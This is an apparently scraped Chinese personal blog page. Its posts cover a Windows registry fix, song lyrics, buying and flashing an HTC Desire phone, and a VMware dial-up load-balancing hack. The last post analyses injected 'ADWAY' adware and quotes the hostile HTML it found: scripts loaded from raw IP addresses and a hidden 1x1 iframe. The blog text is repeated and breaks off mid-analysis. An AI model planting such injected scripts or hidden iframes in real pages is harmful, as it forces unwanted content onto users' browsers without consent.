26,Mar,2011 | (471/0)win7/vista 桌面右键出现cmd窗口解决方法
一MM电脑看片过多,
...电脑中标..且桌面右键会弹出不明CMD窗体,弹出后迅速消失..桌面右键菜单无法使用...深入检查后.发现运行的窗体程序是igfxsrvc.exe,解决方法.
打开注册表管理器(菜单->运行->输入regedit)
然后依次展开 HKEY_CLASSES_ROOT-- Directory ---Background ---shellex ---ContextMenuHandlers.找到igfxcui该项.
删除掉igfxcui此项.关闭regedit..故障消失.
...电脑中标..且桌面右键会弹出不明CMD窗体,弹出后迅速消失..桌面右键菜单无法使用...深入检查后.发现运行的窗体程序是igfxsrvc.exe,解决方法.打开注册表管理器(菜单->运行->输入regedit)
然后依次展开 HKEY_CLASSES_ROOT-- Directory ---Background ---shellex ---ContextMenuHandlers.找到igfxcui该项.
删除掉igfxcui此项.关闭regedit..故障消失.
23,Mar,2011 | (322/0)What Are Words
Flash Player文件美国偶像第十季绝种好男人Chris Medina止步24强,他的海选故事感动了千万观众,Chris Medina与女友本以订婚,他的女友因意外造成创伤性脑损伤,生活不能自理,但他依然不离不弃的去照顾未婚妻。并誓言一辈子不会离她而去。
歌词
Anywhere you are, I am near
Anywhere you go, I'll be there
Anytime you whisper my name, you'll see
How every single promise I keep
Cuz what kind of guy would I be
If I was to leave when you need me most
What are words
If you really don't mean them
When you say them
What are words
If they're only for good times
Then they don't
When it's love
Yeah, you say them out loud
Those words, They never go away
They live on, even when we're gone
And I know an angel was sent just for me
And I know I'm meant to be where I am
And I'm gonna be
Standing right beside her tonight
And I'm gonna be by your side
I would never leave when she needs me most
What are words
If you really don't mean them
When you say them
What are words
If they're only for good times
Then they don't
When it's love
Yeah, you say them out loud
Those words, They never go away
They live on, even when we're gone
Anywhere you are, I am near
Anywhere you go, I'll be there
And I'm gonna be here forever more
Every single promise I keep
Cuz what kind of guy would I be
If I was to leave when you need me most
I'm forever keeping my angel close
24,Nov,2010 | (2031/3)入手HTC Desire 多图杀猫
价格基本参照淘宝,3K.本想出去多找找实体店,乃至想跑去不夜城那边找找几家对比价格和服务.网上几大安卓论坛看好价格后没去不夜城.价格都差不多,不夜城去了也是碰运气找店家,万一对方倒闭跑路了反而没的找,最终选择了以前购买过的非常手机实体店.
这家店价格略贵,但你去实体店可以挑机器,有问题的可以不要,出问题了可以找他们,相对来说有点保障.
网上价格是3030,门店价格3K3不还价.其中300RMB是所谓的硬件和软件一年保修...无奈是水货,有时候还真不好说,不掏这300RMB,万一有问题自己解决起来也麻烦..挑好机器回来看系统是网上所谓的goapk的2.2系统,看了下非常烂,虽然去掉了部分原生系统不必要的软件,但也集成进去了所谓GOAPK的安智市场,我十分鄙视.这玩意无非是他们赚钱的玩意,软件厂商钱给的多就有排名.还是用原生的谷歌市场,于是傻瓜式的RUU刷了最新Desire最新系统.
获取官方RUU
http://shipped-roms.com/shipped/Bravo/
最新的为
RUU_Bravo_Froyo_HKCSL_CHT_2.11.832.2_R_Radio_32.47.00.3
2U_5.10.05.23_release_145080_signed.exe
开始刷机

Desire包装拆解

这家店价格略贵,但你去实体店可以挑机器,有问题的可以不要,出问题了可以找他们,相对来说有点保障.
网上价格是3030,门店价格3K3不还价.其中300RMB是所谓的硬件和软件一年保修...无奈是水货,有时候还真不好说,不掏这300RMB,万一有问题自己解决起来也麻烦..挑好机器回来看系统是网上所谓的goapk的2.2系统,看了下非常烂,虽然去掉了部分原生系统不必要的软件,但也集成进去了所谓GOAPK的安智市场,我十分鄙视.这玩意无非是他们赚钱的玩意,软件厂商钱给的多就有排名.还是用原生的谷歌市场,于是傻瓜式的RUU刷了最新Desire最新系统.
获取官方RUU
http://shipped-roms.com/shipped/Bravo/
最新的为
RUU_Bravo_Froyo_HKCSL_CHT_2.11.832.2_R_Radio_32.47.00.3
2U_5.10.05.23_release_145080_signed.exe
开始刷机
Desire包装拆解
11,Oct,2010 | (1152/1)vmware 虚拟16张网卡9次拨号负载均衡
搞了2个小时发现速度始终上不去,后来才发现迅雷被我限制2MB/S.16个虚拟网卡,获取9个电信IP,每个IP 4Mbps/s,共获得36Mbps/8=4.5MB/s.无聊搞出来下载电影用的.可也没什么好下载的....除了 新出来的Ubuntu 10.10
数据不标记,浏览网页,上传附件头疼...网银直接指定出口就行了..
,10,Oct,2010 | (2713/1)ADWAY恶意广告
相关信息可以Google 关键字:ADWAY恶意广告,www.izptec.com
相关链接
http://bbs.rockbeer.org/redirect.php?tid=1241669484&goto=lastpost
http://www.admin5.com/article/20100601/238050.shtml
http://dongxi.net/b02Mr
http://www.lidiansoft.com/blog/post/1133.html
http://bbs.drpc.cn/viewthread.php?tid=128&page=1
http://www.315ts.net/archive/tousu/2010/1008/888273.shtml
http://www.dongqifei.com/tag/%E6%B5%81%E6%B0%93%E5%B9%BF%E5%91%8A/
http://space.scmlife.com/home-space-uid-12-do-blog-id-1.html
http://bbs.chinaunix.net/viewthread.php?tid=1794483
最近浏览某游戏论坛发现右下角一直出现一个flash广告,刚开始并未太注意这个广告,以为是这个游戏论坛所加载的.后来我在这个游戏论坛询问是否有加载类似广告时,相关人员给予了否定.因为也没什么大碍,就没去关注了..
直到今天偶尔从另外一个站点跳转到这个游戏论坛时发现又弹出了这个flash广告.如图

使用相关工具查看后发现如下代码
如图所示

<html debug="true">
<head>
<body>
<iframe id="fulliframe" lang="utf-8" name="fulliframe" src="" width="100%" height="100%" marginheight="0" marginwidth="0" frameborder="0"/>
<script language="JavaScript" type="text/javascript">
<script src="http://124.232.136.147/pagead/ads.js?umask=26&interval=600&vask=3364566430&uid=1800260239&pid=72057923437190054&o_url=bbs.duowan.com/forum-7-1.html&aname=00007703&ic=00007488&vh=00007494,512|00007411,319|00007488,270|00007484,229|00007414,116|00007417,93|00008502,90|00007470,87&ipc_type=CTN&ipc_nid=0" language="javascript" type="text/javascript"/>
<script src="http://59.51.96.35/10092002/images/asd.js" type="text/javascript" defer=""/>
<div id="pzi_container" style="position: absolute; z-index: 100; bottom: 0px; right: 16px; display: block; width: 300px; height: 290px; background-color: transparent; ">
<iframe width="1" height="1" style="background-color: transparent; " allowtransparency="true" frameborder="0" scrolling="no" src="http://59.51.96.35/10092002//impression.html?http://bbs.duowan.com/forum-7-1.html&random=0.4169298824854195"/>
</body>
</html>
我们看到这样几句代码
<script src="http://124.232.136.147/pagead/ads.js?umask=26&interval=600&vask=3364566430&uid=1800260239&pid=72057923437190054&o_url=bbs.duowan.com/forum-7-1.html&aname=00007703&ic=00007488&vh=00007494,512|00007411,319|00007488,270|00007484,229|00007414,116|00007417,93|00008502,90|00007470,87&ipc_type=CTN&ipc_nid=0" language="javascript" type="text/javascript"/>
<script src="http://59.51.96.35/10092002/images/asd.js" type="text/javascript" defer=""/>
<iframe width="1" height="1" style="background-color: transparent; " allowtransparency="true" frameborder="0" scrolling="no" src="http://59.51.96.35/10092002//impression.html?http://bbs.duowan.com/forum-7-1.html&random=0.4169298824854195"/>
经过测试
http://59.51.96.35/10092002/
这个链接打开后右下角便会弹出flash广告,看来某些人士就是iframe了这个页面.
查看http://59.51.96.35/10092002//impression.html 这个页面代码后
发现如下代码
相关链接
http://bbs.rockbeer.org/redirect.php?tid=1241669484&goto=lastpost
http://www.admin5.com/article/20100601/238050.shtml
http://dongxi.net/b02Mr
http://www.lidiansoft.com/blog/post/1133.html
http://bbs.drpc.cn/viewthread.php?tid=128&page=1
http://www.315ts.net/archive/tousu/2010/1008/888273.shtml
http://www.dongqifei.com/tag/%E6%B5%81%E6%B0%93%E5%B9%BF%E5%91%8A/
http://space.scmlife.com/home-space-uid-12-do-blog-id-1.html
http://bbs.chinaunix.net/viewthread.php?tid=1794483
最近浏览某游戏论坛发现右下角一直出现一个flash广告,刚开始并未太注意这个广告,以为是这个游戏论坛所加载的.后来我在这个游戏论坛询问是否有加载类似广告时,相关人员给予了否定.因为也没什么大碍,就没去关注了..
直到今天偶尔从另外一个站点跳转到这个游戏论坛时发现又弹出了这个flash广告.如图
使用相关工具查看后发现如下代码
如图所示
<html debug="true">
<head>
<body>
<iframe id="fulliframe" lang="utf-8" name="fulliframe" src="" width="100%" height="100%" marginheight="0" marginwidth="0" frameborder="0"/>
<script language="JavaScript" type="text/javascript">
<script src="http://124.232.136.147/pagead/ads.js?umask=26&interval=600&vask=3364566430&uid=1800260239&pid=72057923437190054&o_url=bbs.duowan.com/forum-7-1.html&aname=00007703&ic=00007488&vh=00007494,512|00007411,319|00007488,270|00007484,229|00007414,116|00007417,93|00008502,90|00007470,87&ipc_type=CTN&ipc_nid=0" language="javascript" type="text/javascript"/>
<script src="http://59.51.96.35/10092002/images/asd.js" type="text/javascript" defer=""/>
<div id="pzi_container" style="position: absolute; z-index: 100; bottom: 0px; right: 16px; display: block; width: 300px; height: 290px; background-color: transparent; ">
<iframe width="1" height="1" style="background-color: transparent; " allowtransparency="true" frameborder="0" scrolling="no" src="http://59.51.96.35/10092002//impression.html?http://bbs.duowan.com/forum-7-1.html&random=0.4169298824854195"/>
</body>
</html>
我们看到这样几句代码
<script src="http://124.232.136.147/pagead/ads.js?umask=26&interval=600&vask=3364566430&uid=1800260239&pid=72057923437190054&o_url=bbs.duowan.com/forum-7-1.html&aname=00007703&ic=00007488&vh=00007494,512|00007411,319|00007488,270|00007484,229|00007414,116|00007417,93|00008502,90|00007470,87&ipc_type=CTN&ipc_nid=0" language="javascript" type="text/javascript"/>
<script src="http://59.51.96.35/10092002/images/asd.js" type="text/javascript" defer=""/>
<iframe width="1" height="1" style="background-color: transparent; " allowtransparency="true" frameborder="0" scrolling="no" src="http://59.51.96.35/10092002//impression.html?http://bbs.duowan.com/forum-7-1.html&random=0.4169298824854195"/>
经过测试
http://59.51.96.35/10092002/
这个链接打开后右下角便会弹出flash广告,看来某些人士就是iframe了这个页面.
查看http://59.51.96.35/10092002//impression.html 这个页面代码后
发现如下代码









